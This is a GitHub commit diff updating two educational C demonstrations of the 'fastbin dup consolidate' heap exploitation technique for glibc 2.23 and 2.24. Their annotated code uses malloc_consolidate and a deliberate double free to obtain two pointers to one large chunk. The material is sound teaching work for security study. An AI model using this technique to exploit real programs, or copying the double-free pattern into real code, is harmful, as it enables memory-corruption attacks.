Skip to content

Commit

Permalink
support 2.23 and 2.24 without tcache
Browse files Browse the repository at this point in the history
  • Loading branch information
k4lizen committed May 21, 2024
1 parent 66da022 commit 167a69e
Show file tree
Hide file tree
Showing 2 changed files with 93 additions and 36 deletions.
63 changes: 46 additions & 17 deletions glibc_2.23/fastbin_dup_consolidate.c
Original file line number Diff line number Diff line change
Expand Up @@ -2,35 +2,64 @@
#include <stdlib.h>
#include <assert.h>

/*
Original reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8
This document is mostly used to demonstrate malloc_consolidate and how it can be leveraged with a
double free to gain two pointers to the same large-sized chunk, which is usually difficult to do
directly due to the previnuse check.
malloc_consolidate(https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4714) essentially
merges all fastbin chunks with their neighbors, puts them in the unsorted bin and merges them with top
if possible.
As of glibc version 2.35 it is called only in the following five places:
1. _int_malloc: A large sized chunk is being allocated (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3965)
2. _int_malloc: No bins were found for a chunk and top is too small (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4394)
3. _int_free: If the chunk size is >= FASTBIN_CONSOLIDATION_THRESHOLD (65536) (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4674)
4. mtrim: Always (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L5041)
5. __libc_mallopt: Always (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L5463)
We will be targeting the first place, so we will need to allocate a chunk that does not belong in the
small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901).
This means our chunk will need to be of size >= 0x400 (it is thus large-sized).
*/

int main() {
// reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8
puts("This is a powerful technique that bypasses the double free check in tcachebin.");
printf("Fill up the tcache list to force the fastbin usage...\n");
printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication of a large-sized chunk\n");

void* p1 = calloc(1,0x40);

printf("Allocate another chunk of the same size p1=%p \n", p1);
printf("Freeing p1 will add this chunk to the fastbin list...\n\n");
free(p1);
printf("Allocate a fastbin chunk p1=%p \n", p1);
printf("Freeing p1 will add it to the fastbin.\n\n");
free(p1);

void* p3 = malloc(0x400);

printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
printf("a chunk with chunk size 0x410. p3=%p\n", p3);

void* p3 = malloc(0x400);
printf("Allocating a tcache-sized chunk (p3=%p)\n", p3);
printf("will trigger the malloc_consolidate and merge\n");
printf("the fastbin chunks into the top chunk, thus\n");
printf("p1 and p3 are now pointing to the same chunk !\n\n");
printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");

assert(p1 == p3);

printf("Triggering the double free vulnerability!\n\n");
free(p1);
printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
free(p1); // vulnerability

printf("So p1 is double freed, and p3 hasn't been freed although it now points to the top, as our\n");
printf("chunk got consolidated with it. We have thus achieved UAF!\n");

printf("We will request a chunk of size 0x400, this will give us a 0x410 chunk from the top\n");
printf("p3 and p1 will still be pointing to it.\n");
void *p4 = malloc(0x400);

assert(p4 == p3);

printf("The double free added the chunk referenced by p1 \n");
printf("to the tcache thus the next similar-size malloc will\n");
printf("point to p3: p3=%p, p4=%p\n\n",p3, p4);

printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
printf("and both point to the same large-sized chunk. p3=%p p4=%p\n", p3, p4);
printf("We have achieved duplication!\n\n");
return 0;
}
66 changes: 47 additions & 19 deletions glibc_2.24/fastbin_dup_consolidate.c
Original file line number Diff line number Diff line change
Expand Up @@ -2,36 +2,64 @@
#include <stdlib.h>
#include <assert.h>

int main()
{
// reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8
puts("This is a powerful technique that bypasses the double free check in tcachebin.");
printf("Fill up the tcache list to force the fastbin usage...\n");
/*
Original reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8
This document is mostly used to demonstrate malloc_consolidate and how it can be leveraged with a
double free to gain two pointers to the same large-sized chunk, which is usually difficult to do
directly due to the previnuse check.
malloc_consolidate(https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4714) essentially
merges all fastbin chunks with their neighbors, puts them in the unsorted bin and merges them with top
if possible.
As of glibc version 2.35 it is called only in the following five places:
1. _int_malloc: A large sized chunk is being allocated (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3965)
2. _int_malloc: No bins were found for a chunk and top is too small (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4394)
3. _int_free: If the chunk size is >= FASTBIN_CONSOLIDATION_THRESHOLD (65536) (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4674)
4. mtrim: Always (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L5041)
5. __libc_mallopt: Always (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L5463)
We will be targeting the first place, so we will need to allocate a chunk that does not belong in the
small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901).
This means our chunk will need to be of size >= 0x400 (it is thus large-sized).
*/

int main() {
printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication of a large-sized chunk\n");

void* p1 = calloc(1,0x40);

printf("Allocate another chunk of the same size p1=%p \n", p1);
printf("Freeing p1 will add this chunk to the fastbin list...\n\n");
free(p1);
printf("Allocate a fastbin chunk p1=%p \n", p1);
printf("Freeing p1 will add it to the fastbin.\n\n");
free(p1);

void* p3 = malloc(0x400);

printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
printf("a chunk with chunk size 0x410. p3=%p\n", p3);

void* p3 = malloc(0x400);
printf("Allocating a tcache-sized chunk (p3=%p)\n", p3);
printf("will trigger the malloc_consolidate and merge\n");
printf("the fastbin chunks into the top chunk, thus\n");
printf("p1 and p3 are now pointing to the same chunk !\n\n");
printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");

assert(p1 == p3);

printf("Triggering the double free vulnerability!\n\n");
free(p1);
printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
free(p1); // vulnerability

printf("So p1 is double freed, and p3 hasn't been freed although it now points to the top, as our\n");
printf("chunk got consolidated with it. We have thus achieved UAF!\n");

printf("We will request a chunk of size 0x400, this will give us a 0x410 chunk from the top\n");
printf("p3 and p1 will still be pointing to it.\n");
void *p4 = malloc(0x400);

assert(p4 == p3);

printf("The double free added the chunk referenced by p1 \n");
printf("to the tcache thus the next similar-size malloc will\n");
printf("point to p3: p3=%p, p4=%p\n\n",p3, p4);

printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
printf("and both point to the same large-sized chunk. p3=%p p4=%p\n", p3, p4);
printf("We have achieved duplication!\n\n");
return 0;
}

0 comments on commit 167a69e

Please sign in to comment.